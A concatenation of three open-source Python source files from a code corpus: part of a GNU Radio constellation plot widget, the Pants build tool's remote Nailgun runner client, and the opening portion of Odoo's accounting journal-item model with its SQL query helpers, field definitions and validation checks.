sizer=control_box, parent=self, label='Loop Bandwidth',
converter=forms.float_converter(),
ps=parent, key=LOOP_BW_KEY,
)
forms.log_slider(
sizer=control_box, parent=self,
min_exp=LOOP_BW_MIN_EXP,
max_exp=LOOP_BW_MAX_EXP,
num_steps=SLIDER_STEPS,
ps=parent, key=LOOP_BW_KEY,
)
#gain_mu
control_box.AddStretchSpacer()
forms.text_box(
sizer=control_box, parent=self, label='Gain Mu',
converter=forms.float_converter(),
ps=parent, key=GAIN_MU_KEY,
)
forms.log_slider(
sizer=control_box, parent=self,
min_exp=GAIN_MU_MIN_EXP,
max_exp=GAIN_MU_MAX_EXP,
num_steps=SLIDER_STEPS,
ps=parent, key=GAIN_MU_KEY,
)
#marker
control_box.AddStretchSpacer()
forms.drop_down(
sizer=control_box, parent=self,
ps=parent, key=MARKER_KEY, label='Marker',
choices=map(lambda x: x[1], MARKER_TYPES),
labels=map(lambda x: x[0], MARKER_TYPES),
)
#run/stop
control_box.AddStretchSpacer()
forms.toggle_button(
sizer=control_box, parent=self,
true_label='Stop', false_label='Run',
ps=parent, key=RUNNING_KEY,
)
#set sizer
self.SetSizerAndFit(control_box)
##################################################
# Constellation window with plotter and control panel
##################################################
class const_window(wx.Panel, pubsub.pubsub):
def __init__(
self,
parent,
controller,
size,
title,
msg_key,
loop_bw_key,
gain_mu_key,
gain_omega_key,
omega_key,
sample_rate_key,
):
pubsub.pubsub.__init__(self)
#proxy the keys
self.proxy(MSG_KEY, controller, msg_key)
self.proxy(LOOP_BW_KEY, controller, loop_bw_key)
self.proxy(GAIN_MU_KEY, controller, gain_mu_key)
self.proxy(GAIN_OMEGA_KEY, controller, gain_omega_key)
self.proxy(OMEGA_KEY, controller, omega_key)
self.proxy(SAMPLE_RATE_KEY, controller, sample_rate_key)
#initialize values
self[RUNNING_KEY] = True
self[X_DIVS_KEY] = 8
self[Y_DIVS_KEY] = 8
self[MARKER_KEY] = DEFAULT_MARKER_TYPE
#init panel and plot
wx.Panel.__init__(self, parent, style=wx.SIMPLE_BORDER)
self.plotter = plotter.channel_plotter(self)
self.plotter.SetSize(wx.Size(*size))
self.plotter.SetSizeHints(*size)
self.plotter.set_title(title)
self.plotter.set_x_label('Inphase')
self.plotter.set_y_label('Quadrature')
self.plotter.enable_point_label(True)
self.plotter.enable_grid_lines(True)
#setup the box with plot and controls
self.control_panel = control_panel(self)
main_box = wx.BoxSizer(wx.HORIZONTAL)
main_box.Add(self.plotter, 1, wx.EXPAND)
main_box.Add(self.control_panel, 0, wx.EXPAND)
self.SetSizerAndFit(main_box)
#alpha and gain mu 2nd orders
def set_gain_omega(gain_mu): self[GAIN_OMEGA_KEY] = .25*gain_mu**2
self.subscribe(GAIN_MU_KEY, set_gain_omega)
#register events
self.subscribe(MSG_KEY, self.handle_msg)
self.subscribe(X_DIVS_KEY, self.update_grid)
self.subscribe(Y_DIVS_KEY, self.update_grid)
#initial update
self.update_grid()
def handle_msg(self, msg):
"""
Plot the samples onto the complex grid.
Args:
msg: the array of complex samples
"""
if not self[RUNNING_KEY]: return
#convert to complex floating point numbers
samples = numpy.fromstring(msg, numpy.complex64)
real = numpy.real(samples)
imag = numpy.imag(samples)
#plot
self.plotter.set_waveform(
channel=0,
samples=(real, imag),
color_spec=CONST_PLOT_COLOR_SPEC,
marker=self[MARKER_KEY],
)
#update the plotter
self.plotter.update()
def update_grid(self):
#update the x axis
x_max = 2.0
self.plotter.set_x_grid(-x_max, x_max, common.get_clean_num(2.0*x_max/self[X_DIVS_KEY]))
#update the y axis
y_max = 2.0
self.plotter.set_y_grid(-y_max, y_max, common.get_clean_num(2.0*y_max/self[Y_DIVS_KEY]))
#update plotter
self.plotter.update()
| gpl-3.0 |
manasapte/pants | src/python/pants/bin/remote_pants_runner.py | 7 | 3179 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import signal
import sys
from contextlib import contextmanager
from pants.java.nailgun_client import NailgunClient
from pants.java.nailgun_protocol import NailgunProtocol
from pants.pantsd.process_manager import ProcessMetadataManager
class RemotePantsRunner(object):
"""A thin client variant of PantsRunner."""
class PortNotFound(Exception): pass
PANTS_COMMAND = 'pants'
RECOVERABLE_EXCEPTIONS = (PortNotFound, NailgunClient.NailgunConnectionError)
def __init__(self, exiter, args, env, process_metadata_dir=None,
stdin=None, stdout=None, stderr=None):
"""
:param Exiter exiter: The Exiter instance to use for this run.
:param list args: The arguments (e.g. sys.argv) for this run.
:param dict env: The environment (e.g. os.environ) for this run.
:param str process_metadata_dir: The directory in which process metadata is kept.
:param file stdin: The stream representing stdin.
:param file stdout: The stream representing stdout.
:param file stderr: The stream representing stderr.
"""
self._exiter = exiter
self._args = args
self._env = env
self._process_metadata_dir = process_metadata_dir
self._stdin = stdin or sys.stdin
self._stdout = stdout or sys.stdout
self._stderr = stderr or sys.stderr
self._port = self._retrieve_pailgun_port()
if not self._port:
raise self.PortNotFound('unable to locate pailgun port!')
@staticmethod
def _combine_dicts(*dicts):
"""Combine one or more dicts into a new, unified dict (dicts to the right take precedence)."""
return {k: v for d in dicts for k, v in d.items()}
@contextmanager
def _trapped_control_c(self, client):
"""A contextmanager that overrides the SIGINT (control-c) handler and handles it remotely."""
def handle_control_c(signum, frame):
client.send_control_c()
existing_sigint_handler = signal.signal(signal.SIGINT, handle_control_c)
signal.siginterrupt(signal.SIGINT, False) # Retry interrupted system calls.
try:
yield
finally:
signal.signal(signal.SIGINT, existing_sigint_handler)
def _retrieve_pailgun_port(self):
return ProcessMetadataManager(
self._process_metadata_dir).read_metadata_by_name('pantsd', 'socket_pailgun', int)
def run(self, args=None):
# Merge the nailgun TTY capability environment variables with the passed environment dict.
ng_env = NailgunProtocol.isatty_to_env(self._stdin, self._stdout, self._stderr)
modified_env = self._combine_dicts(self._env, ng_env)
# Instantiate a NailgunClient.
client = NailgunClient(port=self._port, ins=self._stdin, out=self._stdout, err=self._stderr)
with self._trapped_control_c(client):
# Execute the command on the pailgun.
result = client.execute(self.PANTS_COMMAND, *self._args, **modified_env)
# Exit.
self._exiter.exit(result)
| apache-2.0 |
darkleons/odoo | addons/account/account_move_line.py | 9 | 78170 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from datetime import datetime
from openerp import workflow
from openerp.osv import fields, osv
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
from openerp import tools
from openerp.report import report_sxw
import openerp
class account_move_line(osv.osv):
_name = "account.move.line"
_description = "Journal Items"
def _query_get(self, cr, uid, obj='l', context=None):
fiscalyear_obj = self.pool.get('account.fiscalyear')
fiscalperiod_obj = self.pool.get('account.period')
account_obj = self.pool.get('account.account')
fiscalyear_ids = []
context = dict(context or {})
initial_bal = context.get('initial_bal', False)
company_clause = " "
if context.get('company_id', False):
company_clause = " AND " +obj+".company_id = %s" % context.get('company_id', False)
if not context.get('fiscalyear', False):
if context.get('all_fiscalyear', False):
#this option is needed by the aged balance report because otherwise, if we search only the draft ones, an open invoice of a closed fiscalyear won't be displayed
fiscalyear_ids = fiscalyear_obj.search(cr, uid, [])
else:
fiscalyear_ids = fiscalyear_obj.search(cr, uid, [('state', '=', 'draft')])
else:
#for initial balance as well as for normal query, we check only the selected FY because the best practice is to generate the FY opening entries
fiscalyear_ids = [context['fiscalyear']]
fiscalyear_clause = (','.join([str(x) for x in fiscalyear_ids])) or '0'
state = context.get('state', False)
where_move_state = ''
where_move_lines_by_date = ''
if context.get('date_from', False) and context.get('date_to', False):
if initial_bal:
where_move_lines_by_date = " AND " +obj+".move_id IN (SELECT id FROM account_move WHERE date < '" +context['date_from']+"')"
else:
where_move_lines_by_date = " AND " +obj+".move_id IN (SELECT id FROM account_move WHERE date >= '" +context['date_from']+"' AND date <= '"+context['date_to']+"')"
if state:
if state.lower() not in ['all']:
where_move_state= " AND "+obj+".move_id IN (SELECT id FROM account_move WHERE account_move.state = '"+state+"')"
if context.get('period_from', False) and context.get('period_to', False) and not context.get('periods', False):
if initial_bal:
period_company_id = fiscalperiod_obj.browse(cr, uid, context['period_from'], context=context).company_id.id
first_period = fiscalperiod_obj.search(cr, uid, [('company_id', '=', period_company_id)], order='date_start', limit=1)[0]
context['periods'] = fiscalperiod_obj.build_ctx_periods(cr, uid, first_period, context['period_from'])
else:
context['periods'] = fiscalperiod_obj.build_ctx_periods(cr, uid, context['period_from'], context['period_to'])
if context.get('periods', False):
if initial_bal:
query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s)) %s %s" % (fiscalyear_clause, where_move_state, where_move_lines_by_date)
period_ids = fiscalperiod_obj.search(cr, uid, [('id', 'in', context['periods'])], order='date_start', limit=1)
if period_ids and period_ids[0]:
first_period = fiscalperiod_obj.browse(cr, uid, period_ids[0], context=context)
ids = ','.join([str(x) for x in context['periods']])
query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s) AND date_start <= '%s' AND id NOT IN (%s)) %s %s" % (fiscalyear_clause, first_period.date_start, ids, where_move_state, where_move_lines_by_date)
else:
ids = ','.join([str(x) for x in context['periods']])
query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s) AND id IN (%s)) %s %s" % (fiscalyear_clause, ids, where_move_state, where_move_lines_by_date)
else:
query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s)) %s %s" % (fiscalyear_clause, where_move_state, where_move_lines_by_date)
if initial_bal and not context.get('periods', False) and not where_move_lines_by_date:
#we didn't pass any filter in the context, and the initial balance can't be computed using only the fiscalyear otherwise entries will be summed twice
#so we have to invalidate this query
raise osv.except_osv(_('Warning!'),_("You have not supplied enough arguments to compute the initial balance, please select a period and a journal in the context."))
if context.get('journal_ids', False):
query += ' AND '+obj+'.journal_id IN (%s)' % ','.join(map(str, context['journal_ids']))
if context.get('chart_account_id', False):
child_ids = account_obj._get_children_and_consol(cr, uid, [context['chart_account_id']], context=context)
query += ' AND '+obj+'.account_id IN (%s)' % ','.join(map(str, child_ids))
query += company_clause
return query
def _amount_residual(self, cr, uid, ids, field_names, args, context=None):
"""
This function returns the residual amount on a receivable or payable account.move.line.
By default, it returns an amount in the currency of this journal entry (maybe different
of the company currency), but if you pass 'residual_in_company_currency' = True in the
context then the returned amount will be in company currency.
"""
res = {}
if context is None:
context = {}
cur_obj = self.pool.get('res.currency')
for move_line in self.browse(cr, uid, ids, context=context):
res[move_line.id] = {
'amount_residual': 0.0,
'amount_residual_currency': 0.0,
}
if move_line.reconcile_id:
continue
if not move_line.account_id.reconcile:
#this function does not suport to be used on move lines not related to a reconcilable account
continue
if move_line.currency_id:
move_line_total = move_line.amount_currency
sign = move_line.amount_currency < 0 and -1 or 1
else:
move_line_total = move_line.debit - move_line.credit
sign = (move_line.debit - move_line.credit) < 0 and -1 or 1
line_total_in_company_currency = move_line.debit - move_line.credit
context_unreconciled = context.copy()
if move_line.reconcile_partial_id:
for payment_line in move_line.reconcile_partial_id.line_partial_ids:
if payment_line.id == move_line.id:
continue
if payment_line.currency_id and move_line.currency_id and payment_line.currency_id.id == move_line.currency_id.id:
move_line_total += payment_line.amount_currency
else:
if move_line.currency_id:
context_unreconciled.update({'date': payment_line.date})
amount_in_foreign_currency = cur_obj.compute(cr, uid, move_line.company_id.currency_id.id, move_line.currency_id.id, (payment_line.debit - payment_line.credit), round=False, context=context_unreconciled)
move_line_total += amount_in_foreign_currency
else:
move_line_total += (payment_line.debit - payment_line.credit)
line_total_in_company_currency += (payment_line.debit - payment_line.credit)
result = move_line_total
res[move_line.id]['amount_residual_currency'] = sign * (move_line.currency_id and self.pool.get('res.currency').round(cr, uid, move_line.currency_id, result) or result)
res[move_line.id]['amount_residual'] = sign * line_total_in_company_currency
return res
def default_get(self, cr, uid, fields, context=None):
data = self._default_get(cr, uid, fields, context=context)
for f in data.keys():
if f not in fields:
del data[f]
return data
def _prepare_analytic_line(self, cr, uid, obj_line, context=None):
"""
Prepare the values given at the create() of account.analytic.line upon the validation of a journal item having
an analytic account. This method is intended to be extended in other modules.
:param obj_line: browse record of the account.move.line that triggered the analytic line creation
"""
return {'name': obj_line.name,
'date': obj_line.date,
'account_id': obj_line.analytic_account_id.id,
'unit_amount': obj_line.quantity,
'product_id': obj_line.product_id and obj_line.product_id.id or False,
'product_uom_id': obj_line.product_uom_id and obj_line.product_uom_id.id or False,
'amount': (obj_line.credit or 0.0) - (obj_line.debit or 0.0),
'general_account_id': obj_line.account_id.id,
'journal_id': obj_line.journal_id.analytic_journal_id.id,
'ref': obj_line.ref,
'move_id': obj_line.id,
'user_id': uid,
}
def create_analytic_lines(self, cr, uid, ids, context=None):
acc_ana_line_obj = self.pool.get('account.analytic.line')
for obj_line in self.browse(cr, uid, ids, context=context):
if obj_line.analytic_account_id:
if not obj_line.journal_id.analytic_journal_id:
raise osv.except_osv(_('No Analytic Journal!'),_("You have to define an analytic journal on the '%s' journal!") % (obj_line.journal_id.name, ))
if obj_line.analytic_lines:
acc_ana_line_obj.unlink(cr,uid,[obj.id for obj in obj_line.analytic_lines])
vals_line = self._prepare_analytic_line(cr, uid, obj_line, context=context)
acc_ana_line_obj.create(cr, uid, vals_line)
return True
def _default_get_move_form_hook(self, cursor, user, data):
'''Called in the end of default_get method for manual entry in account_move form'''
if data.has_key('analytic_account_id'):
del(data['analytic_account_id'])
if data.has_key('account_tax_id'):
del(data['account_tax_id'])
return data
def convert_to_period(self, cr, uid, context=None):
if context is None:
context = {}
period_obj = self.pool.get('account.period')
#check if the period_id changed in the context from client side
if context.get('period_id', False):
period_id = context.get('period_id')
if type(period_id) == str:
ids = period_obj.search(cr, uid, [('name', 'ilike', period_id)])
context = dict(context, period_id=ids and ids[0] or False)
return context
def _default_get(self, cr, uid, fields, context=None):
#default_get should only do the following:
# -propose the next amount in debit/credit in order to balance the move
# -propose the next account from the journal (default debit/credit account) accordingly
context = dict(context or {})
account_obj = self.pool.get('account.account')
period_obj = self.pool.get('account.period')
journal_obj = self.pool.get('account.journal')
move_obj = self.pool.get('account.move')
tax_obj = self.pool.get('account.tax')
fiscal_pos_obj = self.pool.get('account.fiscal.position')
partner_obj = self.pool.get('res.partner')
currency_obj = self.pool.get('res.currency')
if not context.get('journal_id', False):
context['journal_id'] = context.get('search_default_journal_id', False)
if not context.get('period_id', False):
context['period_id'] = context.get('search_default_period_id', False)
context = self.convert_to_period(cr, uid, context)
# Compute simple values
data = super(account_move_line, self).default_get(cr, uid, fields, context=context)
if context.get('journal_id'):
total = 0.0
#in account.move form view, it is not possible to compute total debit and credit using
#a browse record. So we must use the context to pass the whole one2many field and compute the total
if context.get('line_id'):
for move_line_dict in move_obj.resolve_2many_commands(cr, uid, 'line_id', context.get('line_id'), context=context):
data['name'] = data.get('name') or move_line_dict.get('name')
data['partner_id'] = data.get('partner_id') or move_line_dict.get('partner_id')
total += move_line_dict.get('debit', 0.0) - move_line_dict.get('credit', 0.0)
elif context.get('period_id'):
#find the date and the ID of the last unbalanced account.move encoded by the current user in that journal and period
move_id = False
cr.execute('''SELECT move_id, date FROM account_move_line
WHERE journal_id = %s AND period_id = %s AND create_uid = %s AND state = %s
ORDER BY id DESC limit 1''', (context['journal_id'], context['period_id'], uid, 'draft'))
res = cr.fetchone()
move_id = res and res[0] or False
data['date'] = res and res[1] or period_obj.browse(cr, uid, context['period_id'], context=context).date_start
data['move_id'] = move_id
if move_id:
#if there exist some unbalanced accounting entries that match the journal and the period,
#we propose to continue the same move by copying the ref, the name, the partner...
move = move_obj.browse(cr, uid, move_id, context=context)
data.setdefault('name', move.line_id[-1].name)
for l in move.line_id:
data['partner_id'] = data.get('partner_id') or l.partner_id.id
data['ref'] = data.get('ref') or l.ref
total += (l.debit or 0.0) - (l.credit or 0.0)
#compute the total of current move
data['debit'] = total < 0 and -total or 0.0
data['credit'] = total > 0 and total or 0.0
#pick the good account on the journal accordingly if the next proposed line will be a debit or a credit
journal_data = journal_obj.browse(cr, uid, context['journal_id'], context=context)
account = total > 0 and journal_data.default_credit_account_id or journal_data.default_debit_account_id
#map the account using the fiscal position of the partner, if needed
part = data.get('partner_id') and partner_obj.browse(cr, uid, data['partner_id'], context=context) or False
if account and data.get('partner_id'):
account = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, account.id)
account = account_obj.browse(cr, uid, account, context=context)
data['account_id'] = account and account.id or False
#compute the amount in secondary currency of the account, if needed
if account and account.currency_id:
data['currency_id'] = account.currency_id.id
#set the context for the multi currency change
compute_ctx = context.copy()
compute_ctx.update({
#the following 2 parameters are used to choose the currency rate, in case where the account
#doesn't work with an outgoing currency rate method 'at date' but 'average'
'res.currency.compute.account': account,
'res.currency.compute.account_invert': True,
})
if data.get('date'):
compute_ctx.update({'date': data['date']})
data['amount_currency'] = currency_obj.compute(cr, uid, account.company_id.currency_id.id, data['currency_id'], -total, context=compute_ctx)
data = self._default_get_move_form_hook(cr, uid, data)
return data
def on_create_write(self, cr, uid, id, context=None):
if not id:
return []
ml = self.browse(cr, uid, id, context=context)
return map(lambda x: x.id, ml.move_id.line_id)
def _balance(self, cr, uid, ids, name, arg, context=None):
if context is None:
context = {}
c = context.copy()
c['initital_bal'] = True
sql = """SELECT l1.id, COALESCE(SUM(l2.debit-l2.credit), 0)
FROM account_move_line l1 LEFT JOIN account_move_line l2
ON (l1.account_id = l2.account_id
AND l2.id <= l1.id
AND """ + \
self._query_get(cr, uid, obj='l2', context=c) + \
") WHERE l1.id IN %s GROUP BY l1.id"
cr.execute(sql, [tuple(ids)])
return dict(cr.fetchall())
def _invoice(self, cursor, user, ids, name, arg, context=None):
invoice_obj = self.pool.get('account.invoice')
res = {}
for line_id in ids:
res[line_id] = False
cursor.execute('SELECT l.id, i.id ' \
'FROM account_move_line l, account_invoice i ' \
'WHERE l.move_id = i.move_id ' \
'AND l.id IN %s',
(tuple(ids),))
invoice_ids = []
for line_id, invoice_id in cursor.fetchall():
res[line_id] = invoice_id
invoice_ids.append(invoice_id)
invoice_names = {False: ''}
for invoice_id, name in invoice_obj.name_get(cursor, user, invoice_ids, context=context):
invoice_names[invoice_id] = name
for line_id in res.keys():
invoice_id = res[line_id]
res[line_id] = (invoice_id, invoice_names[invoice_id])
return res
def name_get(self, cr, uid, ids, context=None):
if not ids:
return []
result = []
for line in self.browse(cr, uid, ids, context=context):
if line.ref:
result.append((line.id, (line.move_id.name or '')+' ('+line.ref+')'))
else:
result.append((line.id, line.move_id.name))
return result
def _balance_search(self, cursor, user, obj, name, args, domain=None, context=None):
if context is None:
context = {}
if not args:
return []
where = ' AND '.join(map(lambda x: '(abs(sum(debit-credit))'+x[1]+str(x[2])+')',args))
cursor.execute('SELECT id, SUM(debit-credit) FROM account_move_line \
GROUP BY id, debit, credit having '+where)
res = cursor.fetchall()
if not res:
return [('id', '=', '0')]
return [('id', 'in', [x[0] for x in res])]
def _invoice_search(self, cursor, user, obj, name, args, context=None):
if not args:
return []
invoice_obj = self.pool.get('account.invoice')
i = 0
while i < len(args):
fargs = args[i][0].split('.', 1)
if len(fargs) > 1:
args[i] = (fargs[0], 'in', invoice_obj.search(cursor, user,
[(fargs[1], args[i][1], args[i][2])]))
i += 1
continue
if isinstance(args[i][2], basestring):
res_ids = invoice_obj.name_search(cursor, user, args[i][2], [],
args[i][1])
args[i] = (args[i][0], 'in', [x[0] for x in res_ids])
i += 1
qu1, qu2 = [], []
for x in args:
if x[1] != 'in':
if (x[2] is False) and (x[1] == '='):
qu1.append('(i.id IS NULL)')
elif (x[2] is False) and (x[1] == '<>' or x[1] == '!='):
qu1.append('(i.id IS NOT NULL)')
else:
qu1.append('(i.id %s %s)' % (x[1], '%s'))
qu2.append(x[2])
elif x[1] == 'in':
if len(x[2]) > 0:
qu1.append('(i.id IN (%s))' % (','.join(['%s'] * len(x[2]))))
qu2 += x[2]
else:
qu1.append(' (False)')
if qu1:
qu1 = ' AND' + ' AND'.join(qu1)
else:
qu1 = ''
cursor.execute('SELECT l.id ' \
'FROM account_move_line l, account_invoice i ' \
'WHERE l.move_id = i.move_id ' + qu1, qu2)
res = cursor.fetchall()
if not res:
return [('id', '=', '0')]
return [('id', 'in', [x[0] for x in res])]
def _get_move_lines(self, cr, uid, ids, context=None):
result = []
for move in self.pool.get('account.move').browse(cr, uid, ids, context=context):
for line in move.line_id:
result.append(line.id)
return result
def _get_reconcile(self, cr, uid, ids,name, unknow_none, context=None):
res = dict.fromkeys(ids, False)
for line in self.browse(cr, uid, ids, context=context):
if line.reconcile_id:
res[line.id] = str(line.reconcile_id.name)
elif line.reconcile_partial_id:
res[line.id] = str(line.reconcile_partial_id.name)
return res
def _get_move_from_reconcile(self, cr, uid, ids, context=None):
move = {}
for r in self.pool.get('account.move.reconcile').browse(cr, uid, ids, context=context):
for line in r.line_partial_ids:
move[line.move_id.id] = True
for line in r.line_id:
move[line.move_id.id] = True
move_line_ids = []
if move:
move_line_ids = self.pool.get('account.move.line').search(cr, uid, [('journal_id','in',move.keys())], context=context)
return move_line_ids
_columns = {
'name': fields.char('Name', required=True),
'quantity': fields.float('Quantity', digits=(16,2), help="The optional quantity expressed by this line, eg: number of product sold. The quantity is not a legal requirement but is very useful for some reports."),
'product_uom_id': fields.many2one('product.uom', 'Unit of Measure'),
'product_id': fields.many2one('product.product', 'Product'),
'debit': fields.float('Debit', digits_compute=dp.get_precision('Account')),
'credit': fields.float('Credit', digits_compute=dp.get_precision('Account')),
'account_id': fields.many2one('account.account', 'Account', required=True, ondelete="cascade", domain=[('type','<>','view'), ('type', '<>', 'closed')], select=2),
'move_id': fields.many2one('account.move', 'Journal Entry', ondelete="cascade", help="The move of this entry line.", select=2, required=True),
'narration': fields.related('move_id','narration', type='text', relation='account.move', string='Internal Note'),
'ref': fields.related('move_id', 'ref', string='Reference', type='char', store=True),
'statement_id': fields.many2one('account.bank.statement', 'Statement', help="The bank statement used for bank reconciliation", select=1, copy=False),
'reconcile_id': fields.many2one('account.move.reconcile', 'Reconcile', readonly=True, ondelete='set null', select=2, copy=False),
'reconcile_partial_id': fields.many2one('account.move.reconcile', 'Partial Reconcile', readonly=True, ondelete='set null', select=2, copy=False),
'reconcile_ref': fields.function(_get_reconcile, type='char', string='Reconcile Ref', oldname='reconcile', store={
'account.move.line': (lambda self, cr, uid, ids, c={}: ids, ['reconcile_id','reconcile_partial_id'], 50),'account.move.reconcile': (_get_move_from_reconcile, None, 50)}),
'amount_currency': fields.float('Amount Currency', help="The amount expressed in an optional other currency if it is a multi-currency entry.", digits_compute=dp.get_precision('Account')),
'amount_residual_currency': fields.function(_amount_residual, string='Residual Amount in Currency', multi="residual", help="The residual amount on a receivable or payable of a journal entry expressed in its currency (maybe different of the company currency)."),
'amount_residual': fields.function(_amount_residual, string='Residual Amount', multi="residual", help="The residual amount on a receivable or payable of a journal entry expressed in the company currency."),
'currency_id': fields.many2one('res.currency', 'Currency', help="The optional other currency if it is a multi-currency entry."),
'journal_id': fields.related('move_id', 'journal_id', string='Journal', type='many2one', relation='account.journal', required=True, select=True,
store = {
'account.move': (_get_move_lines, ['journal_id'], 20)
}),
'period_id': fields.related('move_id', 'period_id', string='Period', type='many2one', relation='account.period', required=True, select=True,
store = {
'account.move': (_get_move_lines, ['period_id'], 20)
}),
'blocked': fields.boolean('No Follow-up', help="You can check this box to mark this journal item as a litigation with the associated partner"),
'partner_id': fields.many2one('res.partner', 'Partner', select=1, ondelete='restrict'),
'date_maturity': fields.date('Due date', select=True ,help="This field is used for payable and receivable journal entries. You can put the limit date for the payment of this line."),
'date': fields.related('move_id','date', string='Effective date', type='date', required=True, select=True,
store = {
'account.move': (_get_move_lines, ['date'], 20)
}),
'date_created': fields.date('Creation date', select=True),
'analytic_lines': fields.one2many('account.analytic.line', 'move_id', 'Analytic lines'),
'centralisation': fields.selection([('normal','Normal'),('credit','Credit Centralisation'),('debit','Debit Centralisation'),('currency','Currency Adjustment')], 'Centralisation', size=8),
'balance': fields.function(_balance, fnct_search=_balance_search, string='Balance'),
'state': fields.selection([('draft','Unbalanced'), ('valid','Balanced')], 'Status', readonly=True, copy=False),
'tax_code_id': fields.many2one('account.tax.code', 'Tax Account', help="The Account can either be a base tax code or a tax code account."),
'tax_amount': fields.float('Tax/Base Amount', digits_compute=dp.get_precision('Account'), select=True, help="If the Tax account is a tax code account, this field will contain the taxed amount.If the tax account is base tax code, "\
"this field will contain the basic amount(without tax)."),
'invoice': fields.function(_invoice, string='Invoice',
type='many2one', relation='account.invoice', fnct_search=_invoice_search),
'account_tax_id':fields.many2one('account.tax', 'Tax', copy=False),
'analytic_account_id': fields.many2one('account.analytic.account', 'Analytic Account'),
'company_id': fields.related('account_id', 'company_id', type='many2one', relation='res.company',
string='Company', store=True, readonly=True)
}
def _get_date(self, cr, uid, context=None):
if context is None:
context or {}
period_obj = self.pool.get('account.period')
dt = time.strftime('%Y-%m-%d')
if context.get('journal_id') and context.get('period_id'):
cr.execute('SELECT date FROM account_move_line ' \
'WHERE journal_id = %s AND period_id = %s ' \
'ORDER BY id DESC limit 1',
(context['journal_id'], context['period_id']))
res = cr.fetchone()
if res:
dt = res[0]
else:
period = period_obj.browse(cr, uid, context['period_id'], context=context)
dt = period.date_start
return dt
def _get_currency(self, cr, uid, context=None):
if context is None:
context = {}
if not context.get('journal_id', False):
return False
cur = self.pool.get('account.journal').browse(cr, uid, context['journal_id']).currency
return cur and cur.id or False
def _get_period(self, cr, uid, context=None):
"""
Return default account period value
"""
context = context or {}
if context.get('period_id', False):
return context['period_id']
account_period_obj = self.pool.get('account.period')
ids = account_period_obj.find(cr, uid, context=context)
period_id = False
if ids:
period_id = ids[0]
return period_id
def _get_journal(self, cr, uid, context=None):
"""
Return journal based on the journal type
"""
context = context or {}
if context.get('journal_id', False):
return context['journal_id']
journal_id = False
journal_pool = self.pool.get('account.journal')
if context.get('journal_type', False):
jids = journal_pool.search(cr, uid, [('type','=', context.get('journal_type'))])
if not jids:
model, action_id = self.pool['ir.model.data'].get_object_reference(cr, uid, 'account', 'action_account_journal_form')
msg = _("""Cannot find any account journal of "%s" type for this company, You should create one.\n Please go to Journal Configuration""") % context.get('journal_type').replace('_', ' ').title()
raise openerp.exceptions.RedirectWarning(msg, action_id, _('Go to the configuration panel'))
journal_id = jids[0]
return journal_id
_defaults = {
'blocked': False,
'centralisation': 'normal',
'date': _get_date,
'date_created': fields.date.context_today,
'state': 'draft',
'currency_id': _get_currency,
'journal_id': _get_journal,
'credit': 0.0,
'debit': 0.0,
'amount_currency': 0.0,
'account_id': lambda self, cr, uid, c: c.get('account_id', False),
'period_id': _get_period,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.move.line', context=c)
}
_order = "date desc, id desc"
_sql_constraints = [
('credit_debit1', 'CHECK (credit*debit=0)', 'Wrong credit or debit value in accounting entry !'),
('credit_debit2', 'CHECK (credit+debit>=0)', 'Wrong credit or debit value in accounting entry !'),
]
def _auto_init(self, cr, context=None):
res = super(account_move_line, self)._auto_init(cr, context=context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'account_move_line_journal_id_period_id_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX account_move_line_journal_id_period_id_index ON account_move_line (journal_id, period_id)')
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('account_move_line_date_id_index',))
if not cr.fetchone():
cr.execute('CREATE INDEX account_move_line_date_id_index ON account_move_line (date DESC, id desc)')
return res
def _check_no_view(self, cr, uid, ids, context=None):
lines = self.browse(cr, uid, ids, context=context)
for l in lines:
if l.account_id.type in ('view', 'consolidation'):
return False
return True
def _check_no_closed(self, cr, uid, ids, context=None):
lines = self.browse(cr, uid, ids, context=context)
for l in lines:
if l.account_id.type == 'closed':
raise osv.except_osv(_('Error!'), _('You cannot create journal items on a closed account %s %s.') % (l.account_id.code, l.account_id.name))
return True
def _check_company_id(self, cr, uid, ids, context=None):
lines = self.browse(cr, uid, ids, context=context)
for l in lines:
if l.company_id != l.account_id.company_id or l.company_id != l.period_id.company_id:
return False
return True
def _check_date(self, cr, uid, ids, context=None):
for l in self.browse(cr, uid, ids, context=context):
if l.journal_id.allow_date:
if not time.strptime(l.date[:10],'%Y-%m-%d') >= time.strptime(l.period_id.date_start, '%Y-%m-%d') or not time.strptime(l.date[:10], '%Y-%m-%d') <= time.strptime(l.period_id.date_stop, '%Y-%m-%d'):
return False
return True
def _check_currency(self, cr, uid, ids, context=None):
for l in self.browse(cr, uid, ids, context=context):
if l.account_id.currency_id:
if not l.currency_id or not l.currency_id.id == l.account_id.currency_id.id:
return False
return True
def _check_currency_and_amount(self, cr, uid, ids, context=None):
for l in self.browse(cr, uid, ids, context=context):
if (l.amount_currency and not l.currency_id):
return False
return True
def _check_currency_amount(self, cr, uid, ids, context=None):
for l in self.browse(cr, uid, ids, context=context):
if l.amount_currency:
